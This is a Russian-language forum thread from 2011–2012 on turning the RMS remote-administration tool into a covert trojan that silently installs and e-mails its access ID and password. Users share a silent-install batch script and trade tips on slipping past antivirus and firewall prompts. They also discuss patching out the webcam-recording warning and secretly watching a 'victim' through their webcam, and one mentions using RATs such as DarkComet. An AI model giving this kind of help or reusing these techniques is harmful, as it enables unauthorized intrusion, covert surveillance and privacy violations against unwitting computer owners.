RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. vlader
    vlader Guest
    А немножко изменить батник вы что ли не можите?
    Например
    поменять на
    Это не сложно.
    В этой сборке батник и stop.js вообще не нужны. Я не понимаю, зачем автор использовал архив из другой сборки. А вместе с архивом перелетели install.bat и stop.js, потому что архив запускает stop.js, который запускает install.bat.
    Я думаю легче просто давать один RMS.exe или создать другой архив с RMS.exe и вашим файлом.
    А вообще в этой сборке только чужой архив и использование возможностей программы, но всё же получилось хорошо.

4 янв 2012
  2. AndreasV
    AndreasV Новичок
    Симпатии:
    1
    Avira блокирует именно файл install.cmd :
    Код:
    @chcp 1251
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {11A90858-40BB-4858-A2DA-CA6495B5E907} /qn REBOOT=ReallySuppress
    @ping 127.0.0.1
    @MsiExec /I "rms.server5.1b1ru.msi" /qn
    а не install.bat

4 янв 2012
    1 человеку нравится это.
  3. vlader
    vlader Guest
    AndreasV,
    По той же методе.

4 янв 2012
  4. Nark0tik
    Nark0tik Новичок
    Симпатии:
    1
    Товарищи, будьте добры, поделитесь бЭта версией, в закромах же у кого-нить осталась, а то весь нэт облазил там тока на релиз с оффсайта ссыли, а тож самая важная функция - скрытость, не пашет(.
    Кстати плагином для тотал коммандера msi-pluswcx.zip засунул rutserv и rfusclient в пакет msi, вроде нормуль конфигуратор собрал, а вот антивирь не пустил, гавкнул что "содержимое программы возможно изменено вредоносной программой".

7 янв 2012
  5. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    Воюю с версией 5.1,собираю по этому мануалу.Категорически не хотят прятаться окна с предупреждением и о завершении установки.
    В меню не активен пункт "не запрашивать подтверждение,как видно из скрина-
    Версию 5.0 юзал хорошо.
    Приходится снова переходить на RMS ввиду закрытых портов и невозможности теперь юзать раты типа XtremeRat и DarkComet

Последнее редактирование: 8 янв 2012
    8 янв 2012
  6. Nark0tik
    Nark0tik Новичок
    Симпатии:
    1
    Так никто бэту и не приложил, пришлось найти самому. источник не ясен.
    и да кстати в б1 нету галки добавить в исключения для фаирвола при установки вьюира.

Последнее редактирование: 8 янв 2012
    8 янв 2012
    1 человеку нравится это.
  7. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    Ну как,проверял кто то из поста выше?

9 янв 2012
    1 человеку нравится это.
  8. bayan
    bayan Новичок
    Симпатии:
    0
    здравствуйте,прочитал весь пост, своей проблемки так и не нашел.как боритесь с динамичным ip?после установки все работает,но стоит жертве перезагрузить комп так сразу в не сети хотя комп 100 процентов работает.переустановка все опять налаживает .если есть мысли по этому поводу помогите пожалуста винда у жертвы 7-я

9 янв 2012
  9. Nark0tik
    Nark0tik Новичок
    Симпатии:
    1
    оказывается этот архивчик был приложен в топике, толи скрыт. Вроде работает тока фаирвол после установки сервера пишит и соответвено при отказе айди не шлет.

Добавлено через 2 минуты
    bayan, как бы вроде работает через свой айди сервер, так что айпи тут не причем, скорее всего сервер не стартует после перезагрузки.

Добавлено через 1 час 43 минуты
    Проблема с неактианой галкой для тихой установки в финальной версии решилсь до безобразия просто - почти полная аналогия мувика из 166 поста только в отношении неактивной строчки с галкой.
    Только вот есет 4 четвертый не даёт десприпятственно на почту отослать id отослать, гуру подскажите в чем может быть проблема, вчера такого не было.

Последнее редактирование: 9 янв 2012
    9 янв 2012
  10. bayan
    bayan Новичок
    Симпатии:
    0
    а может после перезагрузки его антивирус кушать?я сам сервер когда устанавливал,антивирус отключал,но после установки,обратно подключал,вроде как все работало.а сервак сам после перезагрузки вроде работает,проверю точно отпишусь.просто это не первый комп,и как раз там где динамические ip

9 янв 2012
  11. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Скажите пожалуйста, какими средствами можно определить наличие индикатора работы веб камеры в ноутбуке?

Вот это не работает

Добавлено через 15 минут
    Скрыто и удалённо, естественно, определить. На удалённом ноуте установлен РМС

Последнее редактирование: 10 янв 2012
    10 янв 2012
  12. Nark0tik
    Nark0tik Новичок
    Симпатии:
    1
    Да как же блин рмс в исключения фаирвола на удаленном компе добавить.

10 янв 2012
  13. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    И это решит вопрос с загорающимся индикатором??? Насколько я понимаю загорающийся индикатор уже обойти не возможно.

Или это поможет определить есть индикатор или нету? Если так то каким образом можно добавить рмс в исключения средствами cmd и реестра?

P.S. Зачем так "материться"?) Я же вроде не задаю повторяющихся то

10 янв 2012
  14. Nark0tik
    Nark0tik Новичок
    Симпатии:
    1
    Индикатор "Внимание идет видеозапись" это не проблема решается патчем или с помощью редактора ресурсов и галка на скрытую установка также, а вот после установки когда идет запрос к серверу раздачи айди и паролей, выскакивает предупреждение фаирвола, по типу того: RMS просит подключения к удаленному компьютеру с таким-то айпи. Разрешить или запретить. Соответсвенно при установки клиент сервера не происходить запись в исключения для фаирвола. Если устанавливать ручками без всяких скрытостей, то там будет такая галка и с ней все пашет, после конфигуратора это функция видать отваливается, испытано тока есет 4 антивире на 3 машинах.

Про индикатор, тут было где-то написано: суть такая на разных устройствах по разному: лампочки на вебки окошечки там всякие, ну или визуально сама табличка на удаленном рабочем столе поверх всех окон, можно посмотреть, через просмотр удаленного стола. ну как-то так.

10 янв 2012
  15. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    1. При подключении к просмотру удалённого рабочего стола не разу не видел всплывающих сообщений по типу "RMS просит подключения к удаленному компьютеру с таким-то айпи" - успокой меня, плиз - это значит что их и нет?)))

2. Файлы "пропатчил" - "банер" не всплывает. Единственное, что насторожило так это то, что жертва, при подключении к удалённой вебке, засуетилась и начала запускать её у себя - возможно совпадение, возможно нет.
    Так вот "окошечки там всякие, ну или визуально сама табличка на удаленном рабочем столе поверх всех окон, можно посмотреть, через просмотр удаленного стола" - этого всего не видно (ЗНАЧИТ этого НЕТ? Или РМС мне что то может не показывать :)
    А вот именно "лампочки на вебки" это "на разных устройствах по разному" - и вот именно это мне и нужно узнать - МОДЕЛЬ УСТРОЙСТВА (средствами cmd, реестра, файлового менеджера, скрытого запуска программ).

Я нашёл статью где предлагают ввести в cmd "wmic csproduct get name". На моём компе это срабатывает - мне показывает модель моего ноутбука, но на компе жертвы почему то нет - пишет что то типа: "Подождите пока закончиться установка wmic", но ждать бесполезно.

Ну так что? Возможно узнать модель устройства?! :) Господа хакеры!:af:

11 янв 2012
  16. TDI
    TDI Новичок
    Симпатии:
    32
    через RMS банер ты не увидиш

11 янв 2012
  17. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Такое бывает? Я много экспериментировал - всегда баннер виден - согласись, врядли они будут специально его фильтровать.

НУ ТАК ЧТО НАСЧЁТ МОЕГО ВОПРОСА? Это очень важно! Плиз!:angry:*mrgreen*

11 янв 2012
  18. TDI
    TDI Новичок
    Симпатии:
    32
    в 5.0 я банер не видел
    а в 5.1 может и видно)

11 янв 2012
    1 человеку нравится это.
  19. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Нет, не видно. Всё работает после замены оригинальных файлов на пропатченые. Выше в этой теме с банером в версии 5.1 уже давно разобрались: и видио есть и файлы уже готовые.

Повторяю вопрос на всякий случай. Каким образом имея на удалённом компе РМС вычислить модель аппарата (известно что там ноутбук)???

11 янв 2012
    1 человеку нравится это.
  20. Reymon
    Reymon Новичок
    Симпатии:
    0
    Залейте пожалуйста RMS. 5.1 beta 3 у кого есть.
    Заранее вам благодарен.

11 янв 2012
Статус темы:
Закрыта.
Загрузка...